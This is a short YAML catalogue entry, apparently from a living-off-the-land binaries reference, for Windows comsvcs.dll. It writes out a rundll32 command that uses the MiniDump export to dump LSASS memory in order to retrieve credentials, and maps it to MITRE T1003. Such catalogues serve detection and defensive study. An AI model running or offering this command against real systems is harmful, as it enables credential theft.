---
Name: Comsvcs.dll
Description: COM+ Services
Author:
Created: '2019-08-30'
Commands:
  - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"
    Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump. 
    UseCase: Dump Lsass.exe process memory to retrieve credentials.
    Category: Dump
    Privileges: SYSTEM
    MitreID: T1003
    MItreLink: https://attack.mitre.org/wiki/Technique/T1003
    OperatingSystem: Windows
Full_Path:
  - Path: c:\windows\system32\comsvcs.dll
Code_Sample:
  - Code: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
Detection:
  - IOC:
Resources:
  - Link: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
Acknowledegment:
  - Person: modexp (modexp.wordpress.com)
    Handle: 
---